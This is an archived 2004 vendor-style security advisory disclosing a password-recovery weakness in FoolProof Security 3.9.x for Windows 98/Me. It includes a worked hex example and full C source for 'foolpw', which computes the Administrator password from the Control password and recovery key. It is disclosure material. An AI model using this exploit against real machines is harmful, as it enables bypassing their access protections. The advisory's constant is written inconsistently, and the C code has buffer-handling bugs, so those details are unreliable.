| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: advisories at cyrillium.com (advisories@...illium.com)
Subject: [CYSA-0329] Password recovery vulnerability in FoolProof Security 3.9.x for Windows 95/9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cyrillium Security Advisory CYSA-0329 advisories@...illium.com
http://www.cyrillium.com/ Cyrillium Security Solutions and Services
April 29th, 2004
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Severity: High (Password Compromise)
Vendor:
SmartStuff Software (member of Riverdeep Interactive Learning, Inc.)
Affected Products:
FoolProof Security 3.9.x for Windows 98/98SE/Me
Unaffected Products:
FoolProof Security for Macintosh
FoolProof Security for Windows XP and Windows 2000
1. Problem Description
Cyrillium Security Solutions and Services has discovered a vulnerability
in the password recovery feature of FoolProof Security that allows an
attacker to recover the "Administrator" password using the "Control"
password and password recovery key.
FoolProof for Macintosh and FoolProof for Windows XP & 2000 are not
affected because they do not support the password recovery feature.
2. Details
Passwords are stored as 16-byte, zero-padded ASCII strings. When FoolProof
Security is installed, an "Administrator" password must be specified.
Either the "Administrator" password or the "Control" password may be used
to access the FoolProof control panel and to bypass the Bootlock and
Keylock protection features. If the "Control" password is forgotten or
compromised, the "Administrator" password can be used to either enter the
FoolProof control panel to change the "Control" password or to determine
the "Control" password from the password recovery key.
The password recovery key is a 32-character hexadecimal string that can be
obtained by holding down the Shift key and pressing "OK" in the FoolProof
control panel's initial password dialog box. The ADMINPW.EXE program on
the FoolProof Security installation diskette calculates the "Control"
password from the "Administrator" password and the password recovery key.
The ADMINPW.EXE program combines the zero-padded "Administrator" password
with the password recovery key using the bitwise exclusive OR (XOR)
operation. Next, the ASCII string "D:SKFOIK@(*EHJFL" is subtracted from
the previous result (one byte at a time). The final result is the
"Control" password.
If C represents the "Control" password, A represents the "Administrator"
password, B represents the ASCII string "D:SKFOIJ@(*EHJFL", and K
represents the password recovery key, then manipulating the formula:
C = (A xor K) - B
yields:
A = (C + B) xor K
Thus, the "Administrator" password can be calculated if the "Control"
password and password recovery key are known.
The password recovery key is trivial to obtain by holding down the Shift
key and pressing "OK" in the FoolProof control panel's initial password
dialog box. If the "Control" password is compromised, the "Administrator"
password can be compromised as well.
Example:
Administrator password is "12345":
A = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (hexadecimal)
Control password is "HelloWorld":
C = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
Recovery key (reported by FoolProof control panel):
K = BD AD 8C 83 80 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
Offsets (constant):
B = 44 3A 53 4B 46 4F 49 4A 40 28 2A 45 48 4A 46 4C
Recovery process (ADMINPW.EXE algorithm):
A xor K = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
(A xor K) - B = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
(A xor K) - B = "HelloWorld" = Control password
Reverse recovery process:
C + B = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
(C + B) xor K = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00
(C + B) xor K = "12345" = Administrator password
The "Administrator" password can be successfully determined knowing only
the "Control" password and the password recovery key.
4. Exploit
The following program calculates the "Administrator" password from the
password recovery key and the "Control" password.
Usage:
Invoke the program with the following arguments:
foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD
Example:
C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
12345
Source code:
/*
foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.
Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.
CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc, char *argv[])
{
int i; /* Index variable */
char a, /* Temporary variable for calculations */
k[33], /* Recovery key in hexadecimal */
k_array[17], /* Recovery key as array */
c[17], /* Control password */
*b = "D:SKFOIJ@(*EHJFL", /* Offsets */
hex_temp[2], /* Temporary storage for hexadecimal conversion */
*endptr; /* Output variable for strtoul */
if (argc != 3)
{
puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
return 1;
}
if (strlen (argv[1]) != 16*2)
{
puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
return 1;
}
if (strlen (argv[2]) > 16)
{
puts ("Passwords are limited to 16 characters");
return 1;
}
memset (k, 0, sizeof (b));
memset (k_array, 0, sizeof (b));
memset (c, 0, sizeof (c));
memset (hex_temp, 0, sizeof (hex_temp));
strcpy (k, argv[1]);
strcpy (c, argv[2]);
for (i = 0; i < 16; i++)
{
memcpy (hex_temp, &k[i*2], 2);
k_array[i] = strtoul (hex_temp, &endptr, 16);
if (*endptr != '\0')
{
printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);
return 1;
}
a = (c[i] + b[i]) ^ k_array[i];
putc (a, stdout);
}
puts ("");
return 0;
}
5. Solution
Users who know the "Administrator" password can enter the FoolProof
control panel and bypass Bootlock/Keylock on any computer that has the
same "Administrator" password as the compromised computer. To change the
"Administrator" password, FoolProof Security must be reinstalled.
Upgrading to FoolProof Security 4.0 or higher is recommended because the
password recovery feature has been removed. However, FoolProof versions
4.0 and higher do not support Windows 95, Windows 98, or Windows Me.
Remember to read the uninstallation and upgrade instructions before
upgrading FoolProof Security, especially if you are using
Bootlock/Keylock. Improper uninstallation or upgrading could cause your
computer to fail to boot.
6. References
1. SmartStuff Software: <http://www.smartstuff.com/>
2. Riverdeep Interactive Learning, Inc.: <http://www.riverdeep.net>
7. Copyright
Copyright (C) 2004 Cyrillium Security Solutions and Services. All rights
reserved. Permission is granted to redistribute unmodified copies of
this advisory.
Powered by blists - more mailing lists